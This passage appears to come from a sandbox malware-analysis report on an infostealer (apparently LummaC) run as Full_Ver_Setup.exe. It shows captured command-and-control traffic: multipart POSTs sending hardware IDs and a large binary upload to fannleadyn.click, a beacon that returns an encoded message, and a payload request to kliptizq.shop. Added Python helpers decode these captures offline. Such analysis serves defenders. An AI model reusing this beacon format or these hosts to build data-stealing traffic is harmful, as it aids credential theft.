                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w4gQJB7gBFK3K3Af1ImgkKUVTfl%2FsfdQlNbHvN62f6Cvohy4OHE7cCuJH7oZBI2l0GKiHaMRiPFTeH3lenBGI%2FiCzfkxF9t55KGPCHMJ%2Fa8PB4cSIk3JJI4Et%2BeQsEiNt4Xe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e7fd9e60f45-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1551&rtt_var=586&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21342&delivery_rate=1882656&cwnd=157&unsent_bytes=0&cid=85faca64574218c6&ts=1036&x=0"
2024-12-22 22:30:29 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-22 22:30:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 104.21.63.229 | 443 | 6476 | C:\Users\user\Desktop\Full_Ver_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:30:31 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=ZA887B5551
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 7087
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:31 UTC7087OUTData Raw: 2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                Data Ascii: --ZA887B5551Content-Disposition: form-data; name="hwid"74D8278A7EC1EF22E9E2F0D64B3B48BA--ZA887B5551Content-Disposition: form-data; name="pid"1--ZA887B5551Content-Disposition: form-data; name="lid"hRjzG3--ZINA--ZA887B5551Content-D
2024-12-22 22:30:32 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:32 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=s2nm131pbmtu91p02hbtqk70re; expires=Thu, 17 Apr 2025 16:17:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv1uryKSA99vgUNZ9TbdSMksmIt0QVSLQm37cp1mSmqHE26YBaEVWBNHJWr4C2WNG%2Fg4c8hhtLzVYrqHPHMwP3PHS3CgyZfg2uGjv4%2Fkm0Km8ALn%2FnvgrUFd2EOt%2FDL2WKjD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e90cc0b43bf-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1561&rtt_var=611&sent=7&recv=12&lost=0&retrans=0&sent_bytes=2839&recv_bytes=7996&delivery_rate=1753753&cwnd=252&unsent_bytes=0&cid=11da7dea4c36e7ba&ts=775&x=0"
2024-12-22 22:30:32 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-22 22:30:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
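Added worked example (editor's code, not part of the Joe Sandbox report and not the malware's or the sandbox's own code): decoding the session 5 exchange above. The request body is a multipart/form-data POST whose visible parts carry the fields hwid, pid and lid; the sandbox's "Data Raw" dump of the 7087-byte body is truncated after the third part, so the parser keeps only parts that are complete. The reply is Transfer-Encoding: chunked: the "Data Ascii: fok 8.46.123.189" line is the chunk-size line "f" (15 bytes) followed by the payload "ok 8.46.123.189" with the CR/LF stripped by the viewer, and "0" is the terminating chunk. The hex constants are copied from the session 5 dumps; the function names and the "ok <ipv4>" reply pattern are the editor's own (the pattern only describes what this capture shows).

```python
"""Decode one captured LummaC beacon (session 5 above) offline.

Editor's example code; hex copied from the report's "Data Raw" dumps.
"""
import re

# Content-Type header of the session 5 request, as captured.
SESSION5_CONTENT_TYPE = "multipart/form-data; boundary=ZA887B5551"

# First bytes of the 7087-byte POST body. The sandbox dump is truncated,
# so the last part ("Content-D") is incomplete.
SESSION5_BODY_HEX = (
    "2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 "
    "43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 5a 41 38 38 37 42 35 35 35 31 "
    "0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 "
    "6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 "
    "2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d "
    "0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 "
    "6e 74 2d 44"
)

# The two IN data records of the chunked reply, concatenated (20 + 5 bytes).
SESSION5_REPLY_HEX = "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a 30 0d 0a 0d 0a"


def boundary_from_content_type(content_type: str) -> str:
    """Extract the multipart boundary (quoted or bare) from a Content-Type value."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("no multipart boundary in " + content_type)
    return m.group(2)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for every complete part of a multipart/form-data body.

    A part cut off by a truncated capture (no blank line, or a value without its
    terminating CRLF) is skipped instead of producing a bogus value.
    """
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:          # [0] is the preamble before the first delimiter
        if part.startswith(b"--"):              # closing delimiter "--boundary--"
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep or not value.endswith(b"\r\n"):
            continue                            # truncated part
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = value[:-2].decode("latin-1")
    return fields


def decode_chunked(raw: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body up to the zero-length chunk."""
    out = bytearray()
    pos = 0
    while True:
        nl = raw.find(b"\r\n", pos)
        if nl < 0:
            raise ValueError("chunk size line not terminated")
        size = int(raw[pos:nl].split(b";")[0], 16)  # ignore chunk extensions
        pos = nl + 2
        if size == 0:
            return bytes(out)
        out += raw[pos:pos + size]
        pos += size + 2                             # skip CRLF after the chunk data


def reply_ip(body: bytes):
    """Pull the IPv4 address out of an 'ok <ip>' reply; None if the reply has another shape."""
    m = re.fullmatch(rb"ok (\d{1,3}(?:\.\d{1,3}){3})", body.strip())
    return m.group(1).decode() if m else None


def decode_session5() -> dict:
    """Decode request fields and reply of the captured session in one step."""
    boundary = boundary_from_content_type(SESSION5_CONTENT_TYPE)
    fields = parse_multipart(bytes.fromhex(SESSION5_BODY_HEX), boundary)
    reply = decode_chunked(bytes.fromhex(SESSION5_REPLY_HEX))
    return {"boundary": boundary, "fields": fields,
            "reply": reply.decode("ascii", "replace"), "reply_ip": reply_ip(reply)}


if __name__ == "__main__":
    for k, v in decode_session5().items():
        print(f"{k}: {v}")
```

Run across sessions 3 to 6, the same decoding gives the same hwid and lid with a varying pid, which is what the Data Ascii lines above show; the reply is identical in all four sessions.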


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49742 | 104.21.63.229 | 443 | 6476 | C:\Users\user\Desktop\Full_Ver_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:30:33 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=OFJH7NIY
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 1218
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:33 UTC1218OUTData Raw: 2d 2d 4f 46 4a 48 37 4e 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4f 46 4a 48 37 4e 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 46 4a 48 37 4e 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 4f 46 4a 48 37 4e 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                Data Ascii: --OFJH7NIYContent-Disposition: form-data; name="hwid"74D8278A7EC1EF22E9E2F0D64B3B48BA--OFJH7NIYContent-Disposition: form-data; name="pid"1--OFJH7NIYContent-Disposition: form-data; name="lid"hRjzG3--ZINA--OFJH7NIYContent-Dispositi
Timestamp: 2024-12-22 22:30:34 UTC | Bytes transferred: 1126 | Direction: IN
HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:30:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ptb7da2ctlgob51ulqmrf0v8hh; expires=Thu, 17 Apr 2025 16:17:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XXFiaKMuf2kCocQEmJgGcDDsPSUVElJPfW31NMt%2B4nLdE0rV1pULfaM2H5YlmOWxF1D%2B3vDGbz0a%2F3pvTATw1dPG%2Fvm%2Fzi481FTCVYvDuLjwcq5ojBwvwO695N3Zg63K0YTo"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638e9e4fd342a3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2203&min_rtt=2195&rtt_var=841&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2125&delivery_rate=1288614&cwnd=160&unsent_bytes=0&cid=3ad4186134837c18&ts=780&x=0"
Timestamp: 2024-12-22 22:30:34 UTC | Bytes transferred: 20 | Direction: IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (CRLF shown as \r\n): f\r\nok 8.46.123.189\r\n
Timestamp: 2024-12-22 22:30:34 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii (CRLF shown as \r\n): 0\r\n\r\n


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 104.21.63.229 | Destination Port: 443 | PID: 6476 | Process: C:\Users\user\Desktop\Full_Ver_Setup.exe
Timestamp: 2024-12-22 22:30:36 UTC | Bytes transferred: 284 | Direction: OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=JZQ0PHSKJH649G7IQS3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 589758
Host: fannleadyn.click
Timestamp: 2024-12-22 22:30:36 UTC | Bytes transferred: 15331 | Direction: OUT
Data Ascii (line breaks restored from the hex dump; the report's preview is truncated):
--JZQ0PHSKJH649G7IQS3
Content-Disposition: form-data; name="hwid"

74D8278A7EC1EF22E9E2F0D64B3B48BA
--JZQ0PHSKJH649G7IQS3
Content-Disposition: form-data; name="pid"

1
--JZQ0PHSKJH649G7IQS3
Content-Disposition: form-data; name="lid"

hRjzG3--ZI
Timestamp: 2024-12-22 22:30:36 UTC | Direction: OUT | nine further chunks of 15331 bytes each: non-printable binary payload (hex and ASCII dumps omitted)
Timestamp: 2024-12-22 22:30:38 UTC | Bytes transferred: 1127 | Direction: IN
HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:30:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=lb90omd7k7bteu7ftnackp9j88; expires=Thu, 17 Apr 2025 16:17:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TG1Se7tmdsnBk5ZNSrpbYLdd3YYk%2BsuIwUuNPCwlLuUXAZokoY2ek8uFYTik61TVnLrlhroXxh6EVJWCaiThoFZP4bdsSpYX67%2BnOnqHvfchUOk3oRPppBPniee4tByJYJAC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f638eaf98a38c95-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1982&rtt_var=760&sent=209&recv=614&lost=0&retrans=0&sent_bytes=2839&recv_bytes=592350&delivery_rate=1425085&cwnd=204&unsent_bytes=0&cid=eee3608a4de9bfa7&ts=2435&x=0"


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 104.21.63.229 | Destination Port: 443 | PID: 6476 | Process: C:\Users\user\Desktop\Full_Ver_Setup.exe
Timestamp: 2024-12-22 22:30:40 UTC | Bytes transferred: 265 | Direction: OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 113
Host: fannleadyn.click
Timestamp: 2024-12-22 22:30:40 UTC | Bytes transferred: 113 | Direction: OUT
Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397&hwid=74D8278A7EC1EF22E9E2F0D64B3B48BA
                                                                                                                                                                2024-12-22 22:30:41 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:40 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=ovuvhe4625qb4f1f0u0neh7kjo; expires=Thu, 17 Apr 2025 16:17:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JZMFuuG7tDil0ZajEoAy42mK2PMP6XTjmfSEnN1DiCwODVaFHXRgbMU6r7%2F%2Ba%2B1s3E9yEchoJyqBHeNVjBtQnhuE5gjX0GGrPl6UtjbLHybZ7C5pXIo1bnYaw45EamcktDx3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638ec71b4078e1-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1780&rtt_var=686&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1014&delivery_rate=1573275&cwnd=203&unsent_bytes=0&cid=7260ae015dc60862&ts=798&x=0"
                                                                                                                                                                2024-12-22 22:30:41 UTC218INData Raw: 64 34 0d 0a 79 57 30 6e 43 30 4b 65 79 59 34 4f 31 33 33 31 49 43 45 4e 58 6d 4b 4b 37 4d 72 56 42 37 50 73 36 6f 76 65 46 71 4d 6b 35 6f 57 53 46 67 56 2b 59 4b 54 72 35 6e 71 6a 44 59 59 61 66 53 49 43 54 65 53 4a 75 37 77 70 77 49 53 46 2b 34 49 35 30 45 43 42 37 37 41 59 55 31 64 74 37 72 72 6d 49 4b 4d 46 67 51 49 4e 4c 7a 67 57 71 4e 62 34 2b 53 58 57 7a 74 43 36 6f 7a 72 59 42 70 4f 6e 38 30 39 50 66 7a 62 75 75 72 52 53 2b 43 48 61 53 30 31 6b 4c 68 62 6a 6c 72 76 37 64 4e 75 44 6d 74 66 78 66 38 31 51 75 65 61 6c 48 58 68 6e 4a 75 79 57 2f 57 61 32 55 34 46 59 56 53 39 79 51 4f 79 59 36 4f 38 31 6e 38 36 50 71 65 51 6e 33 6e 6b 3d 0d 0a
                                                                                                                                                                Data Ascii: d4yW0nC0KeyY4O1331ICENXmKK7MrVB7Ps6oveFqMk5oWSFgV+YKTr5nqjDYYafSICTeSJu7wpwISF+4I50ECB77AYU1dt7rrmIKMFgQINLzgWqNb4+SXWztC6ozrYBpOn809PfzbuurRS+CHaS01kLhbjlrv7dNuDmtfxf81QuealHXhnJuyW/Wa2U4FYVS9yQOyY6O81n86PqeQn3nk=
                                                                                                                                                                2024-12-22 22:30:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0
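The response above arrives as two chunked records ("d4" bytes of base64, then the "0" terminator), and the report shows each record as fused "timestamp UTC<bytes><IN|OUT><data>" text. The following is an added example, not Joe Sandbox code, that parses those rows, de-chunks the body and decodes it; the two hex rows are copied verbatim from the session above, everything else is generic. It also shows the one check an analyst needs before trusting such a reassembly: the report truncates long "Data Raw" rows, so a record whose hex is shorter than its byte count cannot be used to rebuild the body.

```python
"""Reassemble and decode a response body from the network rows of a Joe Sandbox report.

Added example for this report, not Joe Sandbox's own code.  The report prints
each captured record as "<timestamp> UTC<bytes><IN|OUT><data>", and a chunked
HTTP body arrives as several "Data Raw" records, so the body must be
de-chunked before its base64 can be decoded.  The rows below are copied
verbatim from the session above (leading whitespace removed); the parser and
the de-chunker are generic.
"""
import base64
import math
import re
from collections import Counter

REPORT_ROWS = [
    "2024-12-22 22:30:41 UTC218INData Raw: "
    "64 34 0d 0a 79 57 30 6e 43 30 4b 65 79 59 34 4f "
    "31 33 33 31 49 43 45 4e 58 6d 4b 4b 37 4d 72 56 "
    "42 37 50 73 36 6f 76 65 46 71 4d 6b 35 6f 57 53 "
    "46 67 56 2b 59 4b 54 72 35 6e 71 6a 44 59 59 61 "
    "66 53 49 43 54 65 53 4a 75 37 77 70 77 49 53 46 "
    "2b 34 49 35 30 45 43 42 37 37 41 59 55 31 64 74 "
    "37 72 72 6d 49 4b 4d 46 67 51 49 4e 4c 7a 67 57 "
    "71 4e 62 34 2b 53 58 57 7a 74 43 36 6f 7a 72 59 "
    "42 70 4f 6e 38 30 39 50 66 7a 62 75 75 72 52 53 "
    "2b 43 48 61 53 30 31 6b 4c 68 62 6a 6c 72 76 37 "
    "64 4e 75 44 6d 74 66 78 66 38 31 51 75 65 61 6c "
    "48 58 68 6e 4a 75 79 57 2f 57 61 32 55 34 46 59 "
    "56 53 39 79 51 4f 79 59 36 4f 38 31 6e 38 36 50 "
    "71 65 51 6e 33 6e 6b 3d 0d 0a",
    "Data Ascii: d4yW0nC0KeyY4O1331ICENXmKK7MrVB7Ps6oveFqMk5oWSFgV+YKTr5nqjDYYafSICTeSJu7wpwISF+4I50ECB77AYU1dt7rrmIKMFgQINLzgWqNb4+SXWztC6ozrYBpOn809PfzbuurRS+CHaS01kLhbjlrv7dNuDmtfxf81QuealHXhnJuyW/Wa2U4FYVS9yQOyY6O81n86PqeQn3nk=",
    "2024-12-22 22:30:41 UTC5INData Raw: 30 0d 0a 0d 0a",
    "Data Ascii: 0",
]

RECORD_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC)"
    r"(?P<size>\d+)(?P<dir>IN|OUT)(?P<data>.*)$"
)


def parse_record(line):
    """Split a fused report row into (timestamp, byte count, direction, data).
    Returns None for continuation rows such as 'Data Ascii: ...'."""
    m = RECORD_RE.match(line)
    if not m:
        return None
    return m["ts"], int(m["size"]), m["dir"], m["data"]


def inbound_raw(rows):
    """Concatenate the hex payloads of all inbound 'Data Raw' records, in order."""
    stream = bytearray()
    for line in rows:
        rec = parse_record(line)
        if rec is None:
            continue
        ts, size, direction, data = rec
        if direction != "IN" or not data.startswith("Data Raw: "):
            continue
        payload = bytes.fromhex(data[len("Data Raw: "):])
        # Joe Sandbox truncates long hex rows; a short row means the body
        # cannot be rebuilt from the report alone, so fail loudly.
        if len(payload) != size:
            raise ValueError(f"record at {ts} shows {len(payload)} bytes, header says {size}")
        stream += payload
    return bytes(stream)


def dechunk(stream):
    """Decode an HTTP/1.1 chunked transfer coding. Returns (body, bytes after the terminator)."""
    body, pos = bytearray(), 0
    while True:
        eol = stream.index(b"\r\n", pos)
        size = int(stream[pos:eol].split(b";", 1)[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:                                        # last-chunk, then trailers, then CRLF
            while True:
                eol = stream.index(b"\r\n", pos)
                line, pos = stream[pos:eol], eol + 2
                if not line:
                    return bytes(body), stream[pos:]
        chunk = stream[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk")
        body += chunk
        pos += size
        if stream[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        pos += 2


def shannon_entropy(data):
    """Bits per byte; values near 8 indicate encrypted or compressed content."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def analyse(rows=REPORT_ROWS):
    """De-chunk the inbound records, base64-decode the body and summarise it."""
    body, rest = dechunk(inbound_raw(rows))
    decoded = base64.b64decode(body, validate=True)
    return {
        "body": body.decode("ascii"),
        "body_len": len(body),
        "decoded_len": len(decoded),
        "entropy": shannon_entropy(decoded),
        "trailing": rest,
    }


if __name__ == "__main__":
    print(analyse())
```

The 212 base64 characters decode to 158 bytes; the entropy figure is the first thing to look at before spending time on the blob, since a value near 8 bits per byte means it is encrypted and the decryption routine has to be recovered from the memory dump rather than from the traffic.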


Session ID: 9 | Source: 192.168.2.4:49748 | Destination: 104.21.84.113:443 | PID: 6476 | Process: C:\Users\user\Desktop\Full_Ver_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:30:52 UTC | 207 | OUT | GET /int_clp_ldr_sha.txt HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Host: kliptizq.shop
2024-12-22 22:30:52 UTC | 548 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:52 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciOJcKc1CufkB1dLLXzpE4QuZtrOWCP2oBhHllYLCvwB8TZJAeZJsDpWXlGpejCJCj0PokzJOCiz14qRai0K%2B%2BSD1jmspZVSAQ466Ysmj5YYU8i3f5RQ8LB8ubN%2BVUCb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638f1188e30f7d-EWR
                                                                                                                                                                2024-12-22 22:30:52 UTC821INData Raw: 31 31 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
